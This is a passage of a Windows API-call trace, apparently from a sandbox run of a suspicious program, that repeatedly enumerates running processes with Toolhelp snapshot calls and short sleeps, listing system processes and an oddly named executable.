szExeFile="svchost.exe")) returned 1 [0209.344] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.344] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0209.345] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.345] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.345] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0209.346] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0209.346] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.346] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0209.347] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0209.347] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.347] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0209.348] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0209.348] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0209.348] Process32NextW (in: hSnapshot=0x100, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0209.349] Sleep (dwMilliseconds=0x64) [0209.491] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x104 [0209.493] Process32FirstW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.493] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0209.493] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0209.493] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.494] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0209.494] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.494] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0209.495] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0209.495] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0209.495] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0209.495] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.496] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.496] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.496] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.497] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.497] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0209.497] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.497] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.498] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0209.498] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0209.498] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.499] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0209.499] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0209.499] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.499] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0209.500] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0209.500] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0209.500] Process32NextW (in: hSnapshot=0x104, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0209.501] Sleep (dwMilliseconds=0x64) [0209.634] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x108 [0209.635] Process32FirstW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.636] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0209.636] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0209.636] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.636] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0209.637] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.637] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0209.637] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0209.638] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0209.638] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0209.638] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.638] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.639] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.639] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.639] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.640] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0209.640] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.640] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.640] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0209.641] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0209.641] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.641] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0209.642] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0209.642] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.642] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0209.642] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0209.643] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0209.643] Process32NextW (in: hSnapshot=0x108, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0209.643] Sleep (dwMilliseconds=0x64) [0209.781] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10c [0209.796] Process32FirstW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.796] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0209.796] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0209.797] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.797] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0209.797] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.797] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0209.798] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0209.798] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0209.798] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0209.799] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.799] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.799] 